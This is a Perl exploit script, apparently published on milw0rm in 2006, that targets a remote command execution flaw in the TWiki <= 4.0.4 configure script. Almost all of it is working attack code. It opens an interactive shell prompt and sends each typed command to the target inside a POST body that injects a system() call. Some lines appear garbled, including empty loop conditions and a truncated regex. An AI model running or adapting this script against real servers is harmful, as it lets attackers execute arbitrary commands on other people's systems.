TWiki <= 4.0.4 (configure) - Remote Command Execution Exploit - Ejecucion de codigo remoto

#!/usr/bin/perl
# Tue Aug 1 13:18:12 CEST 2006 jolascoaga@514.es
use strict;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Request;
use HTTP::Response;
use Getopt::Long;
$| = 1; # couse 1 is bigger than 0
my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$dir, $command);
my $options = GetOptions (
'host=s' => \$host,
'dir=s' => \$dir,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'debug' => \$debug);
&help unless ($host); # you dont need root
$dir = "/twiki/bin/configure" unless($dir); # ... we have a template for this
print "$host - $dir\n";
while () {
print "tinkiwinki> "; # phf haquerz style
while() {
$command=$_;
chomp($command);
last;
}
&send($command);
}

sub send {
my ($cmd) = @_;
my $ok = 0;
my $socket;
LWP::Debug::level('+') if $debug; # but remember this is crap :D
my $ua = new LWP::UserAgent();
$ua->agent("safari/zoo");
if ($host !~ /^http/) {
$host = sprintf ("http://%s", $host); # CRAP CRAP CRAP
}
my $req = HTTP::Request->new(POST => $host.$dir);
$req->content('action=update&TYPEOF%3A%29%3Bsystem%28%27'.$cmd.'%27%29%3Bmy+@a%3D%28=anything&submit=Submit');
$ua->proxy(['http'] => $proxy) if $proxy;
$req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
print $req->as_string() if $debug;
my $res = $ua->request($req);
my $html = $res->content();
$html =~ m/(.*?)

print $1."\n";
if ($debug) {
open (DEBG, ">wikidebug");
print DEBG $html;
}
}
sub help {
print "Syntax: ./$0 --host=url --dir=/horde [options]\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--debug\n";
print "the default directory is /twiki/bin/configure\n";
print "\nExample\n";
print "bash# $0 --host=http(s)://www.server.com/\n";
print "\n";
exit(1);
}
exit 0;
#

# milw0rm.com [2006-08-07]